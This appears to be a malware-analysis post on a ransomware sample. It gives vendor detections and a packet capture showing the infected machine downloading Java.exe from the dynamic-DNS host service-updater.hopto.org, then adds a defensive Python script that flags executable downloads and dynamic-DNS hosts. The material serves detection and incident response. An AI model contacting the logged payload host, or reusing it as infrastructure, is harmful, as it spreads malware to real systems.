Vendor detections for the sample:

Avast: FileRepMetagen [Malware]
AVG: FileRepMetagen [Malware]
Avira (no cloud): (none listed)
Malwarebytes: Ransom.Jigsaw
McAfee-GW-Edition: BehavesLike.Win32.Ransomware.dc
Microsoft: Trojan:Win32/Occamy.C
When executed, this ransomware has NO C2; it uses an e-mail address with directions, as pictured below:
Packet capture from the execution (tcpdump output; the raw byte dump has been trimmed to the decoded summary lines and HTTP headers):

2020-05-01 16:19:09.841147 IP 192.168.86.1.53 > 192.168.86.25.59527: 12228 1/0/0 A 41.97.11.131 (59)   (DNS reply; queried name in payload: service-updater.hopto.org)
2020-05-01 16:19:09.841596 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [S], seq 1891890631, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2020-05-01 16:19:10.021362 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [S.], seq 2051894246, ack 1891890632, win 8192, options [mss 1340,nop,wscale 8,nop,nop,sackOK], length 0
2020-05-01 16:19:10.021569 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [.], ack 1, win 16415, length 0
2020-05-01 16:19:10.022040 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [P.], seq 1:408, ack 1, win 16415, length 407: HTTP: GET /Java.exe HTTP/1.1
    GET /Java.exe HTTP/1.1
    Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
    Accept-Language: en-US
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
    Accept-Encoding: gzip, deflate
    Host: service-updater.hopto.org
    Connection: Keep-Alive
2020-05-01 16:19:10.205818 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [.], ack 408, win 256, length 0
2020-05-01 16:19:10.227305 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [.], seq 1:1341, ack 408, win 256, length 1340: HTTP: HTTP/1.1 200 OK
    HTTP/1.1 200 OK
    Date: Fri, 01 May 2020 20:19:30 GMT
    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
    Last-Modified: Fri, 01 May 2020 01:06:35 GMT
    ETag: "48e00-5a48bcaeea16d"
    Accept-Ranges: bytes
    Content-Length: 298496
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload

    MZ ... This program cannot be run in DOS mode.   (start of the PE payload in the response body)
2020-05-01 16:23:07.891876 IP 192.168.86.25.50993 > 172.217.13.227.80: Flags [P.], seq 1:560, ack 1, win 16560, length 559: HTTP: POST /service/update2?cup2key=10:786262356&cup2hreq=b991085be0dfd36bb56c286a65a7bfd50726b800dd7d6bc969c5f8cc18493bf2 HTTP/1.1
    POST /service/update2?cup2key=10:786262356&cup2hreq=b991085be0dfd36bb56c286a65a7bfd50726b800dd7d6bc969c5f8cc18493bf2 HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Google Update/1.3.35.452;winhttp;cup-ecdsa
    X-Goog-Update-AppId: {430FD4D0-B729-4F61-AA34-91526481799D},{8A69D345-D564-463C-AFF1-A69D9E530F96}
    X-Goog-Update-Updater: Omaha-1.3.35.452
    X-Goog-Update-Interactivity: bg
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    X-HTTP-Attempts: 1
    Content-Length: 1097
    Host: update.googleapis.com
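The capture above carries the points a responder would pull out first: a cleartext GET for an executable, a dynamic-DNS host, and a response whose Content-Type says a PE is being served, next to an unrelated Google Update check-in that should not be flagged. The following Python is an added triage example, not code from the original post; it parses blocks in the shape shown above (tcpdump summary line followed by decoded HTTP headers), pairs each response with its request on the reversed 4-tuple, and emits findings. The sample capture is constructed from the lines on the page with the byte dump removed, and the DDNS suffix list and rule names are assumptions made for the example.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed sample: the three HTTP-bearing packets from the capture above, trimmed to the
# tcpdump summary line plus decoded headers; the Google Update POST is kept as benign noise.
SAMPLE_CAPTURE = """\
2020-05-01 16:19:10.022040 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [P.], seq 1:408, ack 1, win 16415, length 407: HTTP: GET /Java.exe HTTP/1.1
GET /Java.exe HTTP/1.1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: service-updater.hopto.org
Connection: Keep-Alive

2020-05-01 16:19:10.227305 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [.], seq 1:1341, ack 408, win 256, length 1340: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
Content-Length: 298496
Content-Type: application/x-msdownload

2020-05-01 16:23:07.891876 IP 192.168.86.25.50993 > 172.217.13.227.80: Flags [P.], seq 1:560, ack 1, win 16560, length 559: HTTP: POST /service/update2?cup2key=10:786262356 HTTP/1.1
POST /service/update2?cup2key=10:786262356 HTTP/1.1
User-Agent: Google Update/1.3.35.452;winhttp;cup-ecdsa
Host: update.googleapis.com
"""

# tcpdump summary line: "<date> <time> IP a.b.c.d.port > e.f.g.h.port: ... HTTP: <start line>"
SUMMARY_RE = re.compile(
    r"^(?P<ts>\S+ \S+) IP (?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): .*?HTTP: (?P<http>.*)$"
)
HEADER_RE = re.compile(r"^[A-Za-z0-9-]+:\s")  # excludes request/status lines, even with ':' in the URI

# Assumed, deliberately partial watchlist of free dynamic-DNS zones (hopto.org is the one in the
# capture). A hit is a triage lead, not a verdict.
DDNS_SUFFIXES = ("hopto.org", "no-ip.org", "ddns.net", "zapto.org")


@dataclass
class HttpMessage:
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    start_line: str
    headers: Dict[str, str] = field(default_factory=dict)

    @property
    def is_request(self) -> bool:
        return not self.start_line.startswith("HTTP/")

    def flow(self) -> Tuple[str, int, str, int]:
        return (self.src, self.sport, self.dst, self.dport)


def parse_capture(text: str) -> List[HttpMessage]:
    """Split on blank lines; each block is one summary line followed by its decoded HTTP headers."""
    messages: List[HttpMessage] = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.splitlines()
        m = SUMMARY_RE.match(lines[0])
        if not m:
            continue  # not an HTTP-bearing packet (SYN/ACK, DNS, ...)
        msg = HttpMessage(m["ts"], m["src"], int(m["sport"]), m["dst"], int(m["dport"]), m["http"])
        for line in lines[1:]:
            if HEADER_RE.match(line):
                name, _, value = line.partition(":")
                msg.headers[name.strip().lower()] = value.strip()
        messages.append(msg)
    return messages


def triage(messages: List[HttpMessage]) -> List[Tuple[str, str, str]]:
    """Return (timestamp, rule, detail) findings; responses are paired with requests by flow."""
    findings: List[Tuple[str, str, str]] = []
    requests = {msg.flow(): msg for msg in messages if msg.is_request}
    for msg in messages:
        if msg.is_request:
            method, _, rest = msg.start_line.partition(" ")
            path = rest.split(" ")[0].split("?")[0]
            host = msg.headers.get("host", "")
            if method == "GET" and path.lower().endswith(".exe"):
                findings.append((msg.ts, "exe-over-http", f"GET {path} from {host or msg.dst}"))
            if host and any(host == s or host.endswith("." + s) for s in DDNS_SUFFIXES):
                findings.append((msg.ts, "ddns-host", host))
        elif msg.headers.get("content-type", "").startswith("application/x-msdownload"):
            req = requests.get((msg.dst, msg.dport, msg.src, msg.sport))  # reversed 4-tuple
            where = req.start_line if req else "unknown request"
            size = msg.headers.get("content-length", "?")
            findings.append((msg.ts, "pe-served", f"{size} bytes for {where}"))
    return findings


if __name__ == "__main__":
    for ts, rule, detail in triage(parse_capture(SAMPLE_CAPTURE)):
        print(ts, rule, detail)
```

Pairing on the reversed 4-tuple is what lets the `pe-served` finding name the request that produced the executable; matching on the start line alone would misattribute when the same client opens several connections. The Google Update POST produces no finding because neither rule fires on it, which is the behaviour you want before adding noisier rules such as user-agent anomalies.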